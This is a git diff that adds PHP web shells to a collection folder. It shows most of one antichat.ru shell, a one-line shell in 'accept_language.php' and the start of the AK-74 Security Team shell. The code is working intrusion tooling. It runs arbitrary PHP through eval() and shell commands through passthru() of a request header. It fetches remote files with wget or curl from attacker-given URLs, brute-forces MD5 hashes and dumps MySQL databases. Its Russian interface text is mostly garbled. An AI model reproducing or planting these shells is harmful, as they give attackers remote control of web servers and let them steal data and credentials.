+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"30\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
+}}
+//viewer
+if($action=="viewer"){
+$content.="<table cellSpacing=0 border=2 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+$content.="<tr><td><form method=POST><br>Open directory:  <input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\">>\"></form>";
+  if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		if ($GLOBALS['os']==1) {
+		  $content.="<tr><td>Select drive:";
+		  for ($j=ord('C'); $j<=ord('Z'); $j++) 
+		   if (@$dh = opendir(chr($j).":/"))
+		   $content.='<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+		   $content.="</td></tr>";
+		 }
+		$content.="<tr><td>Name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
+		for($i=0;$i<count($dire);$i++) {
+		  $link=$dir.$dire[$i];
+		  $content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';  
+		}
+		for($i=0;$i<count($files);$i++) {
+		  $linkfile=$dir.$files[$i];
+		  $content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td><td>'.perms($linkfile).'</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>'; 
+		}
+		$content.="</table>";
+}}}
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);}
+//phpeval
+if($action=="phpeval"){
+$content.="<form method=\"POST\">
+ <input type=\"hidden\" name=\"action\" value=\"phpeval\">
+ <input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
+ &lt;?php<br>
+ <textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
+ ?><br>
+ <input type=\"submit\" value=\"execute\"></form>";
+if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
+//upload
+if($action=="upload"){
+  if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
+  $form_win="<table><form method=POST enctype=multipart/form-data>
+  <tr><td><input type=\"hidden\" name=\"action\" value=\"upload\">  
+  Upload to dir: <input type=text name=dirupload value=\"".$dirupload."\" size=50><tr><td>New file name: <input type=text name=filename></td></tr><tr><td><input type=file name=file> <input type=submit name=uploadloc value='Upload local file'></td></tr>";
+  if($os==1)$content.=$form_win;
+  if($os==0){
+    $content.=$form_win;
+	$content.='<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
+<input type=submit name=upload value=Upload></form></td></tr>';	
+}
+
+if(isset($_POST['uploadloc'])){
+if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else 
+$uploadfile = $dirupload."/".$_POST['filename'];
+
+if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
+if(file_exists($uploadfile))$content.=$lang['filext']; 
+elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 
+$content.=$lang['uploadok'];
+}
+
+if(isset($_POST['upload'])){
+    if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
+	switch($_POST['with'])
+	{
+	  case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break;
+ 	  case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break;
+ 	  case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;
+}}}
+//Brute
+if($action=="brute"){
+
+function Brute() {
+ global $action,$pass_de,$chars_de,$dat,$date;
+ignore_user_abort(1);
+}
+if($chars_de==""){$chars_de="";}
+$content="<table><form action='$php_self' method=post name=md5><tr><td><b>Decrypte MD5</b>
+<tr><td>&nbsp;MD5 ���:<b>".$pass_de."</b></td>
+<input type='hidden' name='action' value='$action'>
+<tr><td>&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+<td><b>������� ����:</b><br><font color=red><b><u>ENG:</u></b></font>
+<a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a><br>
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:�.,&quot;')>[�������]</a><br><br>
+<font color=red><b><u>RUS:</u></b></font>
+<a class=menu href=javascript:ins('��������������������������������')>[�-�]</a>
+<a class=menu href=javascript:ins('�����Ũ��������������������������')>[�-�]</a>
+<br></br><input type=reset value=�������� class=button1></td></tr>
+<tr><td>&nbsp;<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''>
+</td><td><input type='submit' value='Decrypt MD5' class=button1></td></tr></form>
+<script>
+function ins(text){
+document.md5.chars_de.value+=text;
+document.md5.chars_de.focus();}
+</script>";
+
+if($_POST[pass_de]){  
+$pass_de=htmlspecialchars($pass_de);
+$pass_de=stripslashes($pass_de);
+$dat=date("H:i:s");
+$date=date("d:m:Y");
+}
+{
+crack_md5();
+}
+}
+function crack_md5() {
+global $chars_de;
+$chars=$_POST[chars];
+set_time_limit(0);
+ignore_user_abort(1);
+$chars_de=str_replace("<",chr(60),$chars_de);
+$chars_de=str_replace(">",chr(62),$chars_de);
+$c=strlen($chars_de);
+for ($next = 0; $next <= 31; $next++) {
+for ($i1 = 0; $i1 <= $c; $i1++) {
+$word[1] = $chars_de{$i1};
+for ($i2 = 0; $i2 <= $c; $i2++) {
+$word[2] = $chars_de{$i2};
+if ($next <= 2) {
+result(implode($word));
+}else {
+for ($i3 = 0; $i3 <= $c; $i3++) {
+$word[3] = $chars_de{$i3};
+if ($next <= 3) {
+result(implode($word));
+}else {
+for ($i4 = 0; $i4 <= $c; $i4++) {
+$word[4] = $chars_de{$i4};
+if ($next <= 4) {
+result(implode($word));
+}else {
+for ($i5 = 0; $i5 <= $c; $i5++) {
+$word[5] = $chars_de{$i5};
+if ($next <= 5) {
+result(implode($word));
+}else {
+for ($i6 = 0; $i6 <= $c; $i6++) {
+$word[6] = $chars_de{$i6};
+if ($next <= 6) {
+result(implode($word));
+}else {
+for ($i7 = 0; $i7 <= $c; $i7++) {
+$word[7] = $chars_de{$i7};
+if ($next <= 7) {
+result(implode($word));
+}else {
+for ($i8 = 0; $i8 <= $c; $i8++) {
+$word[8] = $chars_de{$i8};
+if ($next <= 8) {
+result(implode($word));
+}else {
+for ($i9 = 0; $i9 <= $c; $i9++) {
+$word[9] = $chars_de{$i9};
+if ($next <= 9) {
+result(implode($word));
+}else {
+for ($i10 = 0; $i10 <= $c; $i10++) {
+$word[10] = $chars_de{$i10};
+if ($next <= 10) {
+result(implode($word));
+}else {
+for ($i11 = 0; $i11 <= $c; $i11++) {
+$word[11] = $chars_de{$i11};
+if ($next <= 11) {
+result(implode($word));
+}else {
+for ($i12 = 0; $i12 <= $c; $i12++) {
+$word[12] = $chars_de{$i12};
+if ($next <= 12) {
+result(implode($word));
+}else {
+for ($i13 = 0; $i13 <= $c; $i13++) {
+$word[13] = $chars_de{$i13};
+if ($next <= 13) {
+result(implode($word));
+}else {
+for ($i14 = 0; $i14 <= $c; $i14++) {
+$word[14] = $chars_de{$i14};
+if ($next <= 14) {
+result(implode($word));
+}else {
+for ($i15 = 0; $i15 <= $c; $i15++) {
+$word[15] = $chars_de{$i15};
+if ($next <= 15) {
+result(implode($word));
+}else {
+for ($i16 = 0; $i16 <= $c; $i16++) {
+$word[16] = $chars_de{$i16};
+if ($next <= 16) {
+result(implode($word));
+}else {
+for ($i17 = 0; $i17 <= $c; $i17++) {
+$word[17] = $chars_de{$i17};
+if ($next <= 17) {
+result(implode($word));
+}else {
+for ($i18 = 0; $i18 <= $c; $i18++) {
+$word[18] = $chars_de{$i18};
+if ($next <= 18) {
+result(implode($word));
+}else {
+for ($i19 = 0; $i19 <= $c; $i19++) {
+$word[19] = $chars_de{$i19};
+if ($next <= 19) {
+result(implode($word));
+}else {
+for ($i20 = 0; $i20 <= $c; $i20++) {
+$word[20] = $chars_de{$i20};
+if ($next <= 20) {
+result(implode($word));
+}else {
+for ($i21 = 0; $i21 <= $c; $i21++) {
+$word[21] = $chars_de{$i21};
+if ($next <= 21) {
+result(implode($word));
+}else {
+for ($i22 = 0; $i22 <= $c; $i22++) {
+$word[22] = $chars_de{$i22};
+if ($next <= 22) {
+result(implode($word));
+}else {
+for ($i23 = 0; $i23 <= $c; $i23++) {
+$word[23] = $chars_de{$i23};
+if ($next <= 23) {
+result(implode($word));
+}else {
+for ($i24 = 0; $i24 <= $c; $i24++) {
+$word[24] = $chars_de{$i24};
+if ($next <= 24) {
+result(implode($word));
+}else {
+for ($i25 = 0; $i25 <= $c; $i25++) {
+$word[25] = $chars_de{$i25};
+if ($next <= 25) {
+result(implode($word));
+}else {
+for ($i26 = 0; $i26 <= $c; $i26++) {
+$word[26] = $chars_de{$i26};
+if ($next <= 26) {
+result(implode($word));
+}else {
+for ($i27 = 0; $i27 <= $c; $i27++) {
+$word[27] = $chars_de{$i27};
+if ($next <= 27) {
+result(implode($word));
+}else {
+for ($i28 = 0; $i28 <= $c; $i28++) {
+$word[28] = $chars_de{$i28};
+if ($next <= 28) {
+result(implode($word));
+}else {
+for ($i29 = 0; $i29 <= $c; $i29++) {
+$word[29] = $chars_de{$i29};
+if ($next <= 29) {
+result(implode($word));
+}else {
+for ($i30 = 0; $i30 <= $c; $i30++) {
+$word[30] = $chars_de{$i30};
+if ($next <= 30) {
+result(implode($word));
+}else {
+for ($i31 = 0; $i31 <= $c; $i31++) {
+$word[31] = $chars_de{$i31};
+if ($next <= 31) {
+result(implode($word));
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+function result($word) {
+global $dat,$date;
+$pass_de=$_POST[pass_de];
+$dat2=date("H:i:s");
+$date2=date("d:m:Y");
+
+if(md5($word)==$pass_de){ 
+
+
+
+echo "<STYLE>BODY{background-color: #2b2f34;color: #9acd32;</STYLE><table><tr><td>��������� ���������� �������� �������:</td></tr>
+<tr><td>�������������� ������:</b></td><td><font color=red>&nbsp;&nbsp;$word</font></td></tr>
+<tr><td>������ ��������:</td><td>&nbsp;&nbsp;$dat - $date</td></tr>
+<tr><td>��������� ��������:</td><td>&nbsp;&nbsp;$dat2 - $date2</td></tr>
+<tr><td>���������� �������� ����� ������� � ����:  ".$word."_md5</td></tr></table>";
+
+
+
+$f=@fopen($word._md5,"a+");
+fputs($f,"��� �� MD5 [$pass_de] = $word 
+������ ��������:\t$dat - $date 
+��������� ��������:\t$dat2 - $date2");
+exit;
+}}
+
+//Mysql
+
+if($action=="mysql"){
+if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1 .= "# ---------------------------------\r\n";
+     $sql1 .= "#     date : ".date ("j F Y g:i")."\r\n";
+     $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
+     $sql1 .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     $sql2 = '';
+
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while ($row = @mysql_fetch_assoc($res)) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     $content.="<center><b>������! ���� ������ ������!</b></center>";
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    } // end if(@mysql_select_db($_POST['mysql_db'],$db))
+    else $content.="<center><b>����� �� ���!</b></center>";
+   @mysql_close($db);
+   } 
+ } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
+ else if(!empty($_POST['dif'])&&!$fp) { $content.="<center><b>������, ��� ���� ������ � ����!</b></center>"; }
+
+$content.="<form name='mysql_dump' action='$php_self' method='post'>
+<input type='hidden' name='action' value='$action'>
+&nbsp;����: <input type=text name=mysql_db size=15 value=";
+$content.=(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
+$content.=">&nbsp;�������: &nbsp;<input type=text name=mysql_tbl size=15 value=";
+$content.=(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
+$content.=">&nbsp;�����: &nbsp;<input type=text name=mysql_l size=15 value=";
+$content.=(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
+$content.=">&nbsp;������: &nbsp;<input type=text name=mysql_p size=15 value=";
+$content.=(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
+$content.="><input type=hidden name=dir size=85 value=".$dir.">
+<input type=hidden name=cmd size=85 value=mysql_dump>
+<br>&nbsp;��������� ���� � �����: <input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=80 value=";
+$content.=(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
+$content.="><input type=submit name=submit value=���������></form>"; 
+
+@$php_self=$_POST['PHP_SELF'];
+@$from=$_POST['from'];
+@$to=$_POST['to'];
+@$adress=$_POST['adress'];
+@$port=$_POST['port'];
+@$login=$_POST['login'];
+@$pass=$_POST['pass'];
+@$adress=$_POST['adress'];
+@$port=$_POST['port'];
+@$login=$_POST['login'];
+@$pass=$_POST['pass'];
+if(!isset($adress)){$adress="localhost";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+
+if(!@$conn){
+$content.="<form name='mysql_dump' action='$php_self' method='post'>
+<table><tr><td valign=top>
+<input type='hidden' name='action' value='$action'>
+<input type=hidden name=ac value=sql>
+<tr><td valign=top>����: &nbsp;&nbsp;&nbsp;&nbsp;<input name=adress value='$adress' size=20>
+<tr><td valign=top>����: &nbsp;&nbsp;&nbsp;&nbsp;<input name=port value='$port' size=20>
+<tr><td valign=top>�����: &nbsp;&nbsp;<input name=login value='$login' size=20>
+<tr><td valign=top>������: <input name=pass value='$pass' size=20>
+<input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=������������></form></td></tr>
+</table>";
+}
+@$conn=$_POST['conn'];
+@$adress=$_POST['adress'];
+@$port=$_POST['port'];
+@$login=$_POST['login'];
+@$pass=$_POST['pass'];
+if($conn){
+
+$serv = @mysql_connect("$adress:$port", "$login", "$pass") or die("������: ".mysql_error());
+if($serv){
+$content.="<form name='conn' action='$php_self' method='post'><input type=hidden name=conn value=0>
+<input type='hidden' name='action' value='$action'>
+������: ��������� : <input type=submit name=exit value='����� �� ����'></form>
+<table><tr><td><font color=red>[�������]<br></br>";
+}
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+$content.= "<table><a href=\"#\" onclick=\"document.dump1.db.value='$str[0]';document.dump1.tbl.value='$str[0]';document.dump1.submit();\">$str[0]</a></table>";
+@$tc++;
+}
+$content.="<form name='dump1' action='$php_self' method='POST'>
+<input type='hidden' name='action' value='$action'>
+<input type=hidden name=ac value=sql>
+<input name=base value='1' type=hidden>
+<input name=db value='$str[0]' type=hidden>
+<input name=p value='sql' type=hidden>
+<input name=adress value='$adress' type=hidden>
+<input name=port value='$port' type=hidden>
+<input name=login value='$login' type=hidden>
+<input name=pass value='$pass' type=hidden>
+<input name=conn value='1' type=hidden>
+<input name=tbl value='$str[0]' type=hidden></form>";
+
+@$base=$_POST['base'];
+@$db=$_POST['db'];
+$content.="<br></br><font color=red>[����� ������: $tc]";
+if($base){
+$content.="<br></br><font color=red>�������: [$tbl]<br>";
+$result=mysql_list_tables($db);
+while($str=mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+$content.="<table><font color=red>[$records[0]]</font><a href=\"#\" onclick=\"document.dump2.vn.value='$str[0]';document.dump2.tbl.value='$str[0]';document.dump2.submit();\">$str[0]</a></table>";
+
+mysql_free_result($c);
+}}
+$content.="<form name='dump2' action='$php_self' method='post'>
+<input type='hidden' name='action' value='$action'>
+<input type=hidden name=ac value=sql>
+<input name=inside value='1' type=hidden>
+<input name=base value='1' type=hidden>
+<input name=vn value='$str[0]' type=hidden>
+<input name=db value='$db' type=hidden>
+<input name=p value='sql' type=hidden>
+<input name=adress value='$adress' type=hidden>
+<input name=port value='$port' type=hidden>
+<input name=login value='$login' type=hidden>
+<input name=pass value='$pass' type=hidden>
+<input name=tbl value='$str[0]' type=hidden>
+<input name=conn value='1' type=hidden></form>";
+
+@$vn=$_POST['vn'];
+$content.= "<td valign=top>���� ������: $db => $vn<br>";  
+@$inside=$_POST['inside'];
+@$tbl=$_POST['tbl'];
+if($inside){
+$content.= "<table cellpadding=0 cellspacing=1><tr>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+$content.= "�����: $cfa[0]<form name='mysql_dump' action='$php_self' method='post'>
+<input type='hidden' name='action' value='$action'>
+<input type=hidden name=ac value=sql>
+��: <input name=from size=3 value=0>
+��: <input name=to size=3 value=$cfa[0]>
+<input type=submit name=show value='���������'>
+<input type=hidden name=inside value=1>
+<input type=hidden name=vn value=$vn>
+<input type=hidden name=db value=$db>
+<input type=hidden name=login value=$login>
+<input type=hidden name=pass value=$pass>
+<input type=hidden name=adress value=$adress>
+<input type=hidden name=conn value=1>
+<input type=hidden name=base value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value=$tbl>
+</form>";
+@$vn=$_POST['vn'];
+@$from=$_POST['from'];
+@$to=$_POST['to'];
+@$from=$_POST['from'];
+@$to=$_POST['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+$content.="<td>&nbsp;</td><td bgcolor=#44474f><font color=red> $name </font></td> ";
+}
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+$content.= "<tr>";
+foreach ($mn as $come=>$lee) {
+$nst_inside=htmlspecialchars($lee);
+$content.= "<td>&nbsp;</td><td bgcolor=#44474f>$nst_inside</td>\r\n";
+} 
+}
+mysql_free_result($result);
+$content.= "</table>";
+}}}
+
+//end function
+
+?><?=$header;?><table width="100%" bgcolor="#31333b"  align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Shell |. </a></td><td><a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Viewer |.</a></td><td><a href="#" onclick="document.reqs.action.value='editor';document.reqs.file.value='<?=$file;?>';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Editor |.</a></td><td><a href="#" onclick="document.reqs.action.value='upload';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Upload |.</a></td><td><a href="#" onclick="document.reqs.action.value='brute';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Brute |.</a></td><td><a href="#" onclick="document.reqs.action.value='mysql';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Mysql Dumper|.</a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Php Eval |.</a></td><td><a href="#" onclick="history.back();">.| <-back |.</a></td><td><a href="#" onclick="history.forward();">.| forward->|.</a></td></tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''></form><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#363940 borderColorLight=#c0c0c0 border=1> <tr><td>Safe mode: <?php echo $safe_mode;?><br>Disable functions: <?php echo $disfunc;?><br>OS: <?php echo @php_uname();?><br>Server: <?php echo @getenv("SERVER_SOFTWARE")?><br>Id: <?php echo "Uid=".getmyuid(). " Gid=".getmygid(); ?><br><? echo 'Server: '.@gethostbyname($_SERVER["HTTP_HOST"]).' You: '.$_SERVER['REMOTE_ADDR'].' XFF: '.@gethostbyaddr($HTTP_X_FORWARDED_FOR).' ';?></br> Status: <?php echo @$stdata;?></td></tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#363940 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?>
+<br></table><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#44474f BORDER=1 width=100% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=#44474f><tr><td><center><font color='#9acd32' face='Tahoma' size = 2><b>| COPYRIGHT BY ANTICHAT.RU | Made by Grinay | Modified by Go0o$E |</b></font></center></td></tr></table><?=$footer;?>
diff --git a/xakep-shells/PHP/accept_language.php.txt b/xakep-shells/PHP/accept_language.php.txt
new file mode 100644
index 0000000..b3c8e0a
--- /dev/null
+++ b/xakep-shells/PHP/accept_language.php.txt
@@ -0,0 +1 @@
+<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>
diff --git a/xakep-shells/PHP/ak74shell.php.php.txt b/xakep-shells/PHP/ak74shell.php.php.txt
new file mode 100644
index 0000000..413e26e
--- /dev/null
+++ b/xakep-shells/PHP/ak74shell.php.php.txt
@@ -0,0 +1,640 @@
+<?
+/*                              
+
+.:: :[AK-74 Security Team Web Shell Beta Version]: ::.
+
+- AK-74 Security Team Web Site: www.ak74-team.net
+- Released on 01 June 2006.
+- Copyright AK-74 Security Team, 2006.
+- Thank you for using our script. 
+
+*/
+error_reporting(0); 
+set_time_limit(0);
+session_start();
+$xshell = $SERVER_['PHP_SELF'];
+class shell
+{
+
+ function getfiles()
+ {
+  $mas = array();
+  $i = 0;
+  if ($handle = opendir($_SESSION['currentdir']))
+  {
+   while (false !== ($file = readdir($handle)))
+   if ($file != '..')
+    if (!is_dir($_SESSION['currentdir'].'/'.$file))
+	{
+     $mas[$i]['filename'] = $file;
+	 $mas[$i]['filesize'] = filesize($_SESSION['currentdir'].'/'.$file);
+	 $mas[$i]['lastmod'] = date("H.i/d.m.Y", filemtime($_SESSION['currentdir'].'/'.$file));
+	 $i++;
+	}
+   closedir($handle); 
+  }
+  return $mas;
+ }
+
+ function getdirs()
+ {
+  $mas = array();
+  if ($handle = opendir($_SESSION['currentdir']))
+  {
+   while (false !== ($dir = readdir($handle)))
+    if ($dir != '.' && is_dir($_SESSION['currentdir'].'/'.$dir))
+     $mas[] = $dir;
+   closedir($handle); 
+  }
+  return $mas;
+ }
+
+ function geturl()
+ {
+  if ($_SESSION['currentdir'].'/' == $_SERVER['DOCUMENT_ROOT'])
+   return '/';
+  if (strpos($_SESSION['currentdir'],str_replace('\\','/',$_SERVER['DOCUMENT_ROOT'])) === false)
+   return '';
+  return str_replace($_SERVER['DOCUMENT_ROOT'],'',$_SESSION['currentdir'].'/');
+ }
+
+ 
+ function removefile()
+ {
+  if (file_exists($_GET['file']))
+  {
+   chmod($_GET['file'],0777);
+   if (unlink($_GET['file']))
+    return '���� ������!';
+   else
+    return '���� ������!';
+  }
+  else
+   return '���� �� ������!';
+ }
+
+  function removedir()
+ {
+   chmod($_GET['dir'],0777);
+   if (rmdir($_GET['dir']))
+    return '���������� �������!';
+   else
+    return '���������� �� ������a!';
+ }
+ 
+function getmicrotime()
+{
+ list($usec, $sec) = explode(" ",microtime()); 
+ return ((float)$usec + (float)$sec); 
+} 
+
+function getpermission($path)
+{
+
+$perms = fileperms($path);
+
+if (($perms & 0xC000) == 0xC000)
+ $info = 's';
+elseif (($perms & 0xA000) == 0xA000)
+ $info = 'l';
+elseif (($perms & 0x8000) == 0x8000)
+ $info = '-';
+elseif (($perms & 0x6000) == 0x6000)
+ $info = 'b';
+elseif (($perms & 0x4000) == 0x4000)
+ $info = 'd';
+elseif (($perms & 0x2000) == 0x2000)
+ $info = 'c';
+elseif (($perms & 0x1000) == 0x1000)
+ $info = 'p';
+else
+ $info = 'u';
+
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
+
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
+
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
+
+return $info;
+}
+
+function getpermissionarray($path)
+{
+$res = array();
+$perms = fileperms($path);
+
+if (($perms & 0xC000) == 0xC000)
+ $res[] = 's';
+elseif (($perms & 0xA000) == 0xA000)
+ $res[] = 'l';
+elseif (($perms & 0x8000) == 0x8000)
+ $res[] = '-'; 
+elseif (($perms & 0x6000) == 0x6000)
+ $res[] = 'b';
+elseif (($perms & 0x4000) == 0x4000)
+ $res[] = 'd';
+elseif (($perms & 0x2000) == 0x2000)
+ $res[] = 'c';
+elseif (($perms & 0x1000) == 0x1000)
+ $res[] = 'p';
+else
+ $res[] = 'u';
+
+$res[] = (($perms & 0x0100) ? 'r' : '-');
+$res[] = (($perms & 0x0080) ? 'w' : '-');
+$res[] = (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
+
+$res[] = (($perms & 0x0020) ? 'r' : '-');
+$res[] = (($perms & 0x0010) ? 'w' : '-');
+$res[] = (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
+
+$res[] = (($perms & 0x0004) ? 'r' : '-');
+$res[] = (($perms & 0x0002) ? 'w' : '-');
+$res[] = (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
+
+return $res;
+}
+
+function outputhead()
+{
+$res = '';
+$res .= '<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"></head>
+<body>
+<STYLE>
+A:link {
+	COLOR: #4d6d91; TEXT-DECORATION: underline
+}
+A:active {
+	COLOR: #4d6d91; TEXT-DECORATION: underline
+}
+A:visited {
+	COLOR: #4d6d91; TEXT-DECORATION: underline
+}
+A:hover {
+	COLOR: #C10000; TEXT-DECORATION: underline
+}
+TD {
+	FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica
